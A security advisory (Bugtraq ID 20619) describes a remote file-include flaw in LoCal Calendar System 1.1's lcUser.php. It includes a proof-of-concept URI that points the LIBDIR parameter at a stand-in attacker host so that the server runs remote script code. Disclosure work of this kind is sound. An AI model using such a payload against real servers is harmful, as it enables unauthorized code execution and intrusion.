LoCal Calendar System LcUser.PHP Remote File Include Vulnerability
BID:20619
Info
LoCal Calendar System LcUser.PHP Remote File Include Vulnerability
| Bugtraq ID: | 20619 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 18 2006 12:00AM |
| Updated: | Oct 19 2006 10:03PM |
| Credit: | o0xxdark0o is credited with the discovery of this vulnerability. |
| Vulnerable: |
LoCal Calendar System LoCal Calendar System 1.1 |
| Not Vulnerable: | |
Discussion
LoCal Calendar System LcUser.PHP Remote File Include Vulnerability
LoCal Calendar System is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.1 is vulnerable to this issue.
LoCal Calendar System is prone to a remote file-include vulnerability because it fails to properly sanitize user-supplied input.
A successful exploit of this issue allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
Version 1.1 is vulnerable to this issue.
Exploit / POC
LoCal Calendar System LcUser.PHP Remote File Include Vulnerability
Attackers can exploit this issue via a web client.
The following proof-of-concept URI demonstrates this vulnerability:
local/lib/lcUser.php?LIBDIR=http://www.example.com/attacker_file
Attackers can exploit this issue via a web client.
The following proof-of-concept URI demonstrates this vulnerability:
local/lib/lcUser.php?LIBDIR=http://www.example.com/attacker_file
Solution / Fix
LoCal Calendar System LcUser.PHP Remote File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected]:[email protected].
References
LoCal Calendar System LcUser.PHP Remote File Include Vulnerability
References:
References:
- local Calendar System v1.1 (lcUser.php) Remote File Include (o0xxdark0o)
- LoCal Homepage (LoCal)